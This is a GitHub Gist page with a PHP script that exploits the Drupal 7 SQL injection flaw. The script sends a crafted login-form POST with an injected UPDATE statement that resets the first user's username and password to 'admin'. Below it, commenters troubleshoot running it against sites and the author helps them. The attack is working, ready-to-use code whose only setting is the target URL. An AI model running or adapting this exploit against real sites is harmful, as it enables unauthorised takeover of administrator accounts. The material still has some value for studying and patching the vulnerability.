Last active
September 5, 2021 13:49
-
-
Save milankragujevic/61eb72df71b69df80e86 to your computer and use it in GitHub Desktop.
Exploiting Drupal 7's SQL Injection vulnerability to change the admin user's password. http://milankragujevic.com/post/66
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /******************************************************** | |
| * Drupal 7 SQL Injection vulnerability demo | |
| * Created by Milan Kragujevic (of milankragujevic.com) | |
| * Read more at http://milankragujevic.com/post/66 | |
| * This will change the first user's username to admin | |
| * and their password to admin | |
| * Change $url to the website URL | |
| ********************************************************/ | |
| $url = '[URL HERE]'; // URL of the website (http://domain.com/) | |
| $post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; | |
| $params = array( | |
| 'http' => array( | |
| 'method' => 'POST', | |
| 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
| 'content' => $post_data | |
| ) | |
| ); | |
| $ctx = stream_context_create($params); | |
| $data = file_get_contents($url . '?q=node&destination=node', null, $ctx); | |
| if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { | |
| echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login"; | |
| } else { | |
| echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
| } |
@milankragujevic thanks - omitted "http://" in my url - now much data, but the data is the html of the site at $url. The string 'mb_strlen() expects parameter 1 to be string' is not in the $data. If it's helpful, echo $ctx outputs "Resource id #2".
Not really. You should try logging in to the website... If the website has PHP display_errors turned off, you won't see the error. There is no way to verify other than to try and log in.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
@McBochi I'm working on it. I'll update the blog post if I discover something.
@jordanIgraham Please "echo $url . '?q=node&destination=node';" and open the output URL in the browser. Maybe you're simply not entering the URL correctly, or PHP is being blocked by some other means. Turn on error_reporting and display_errors. I can't reproduce the issue.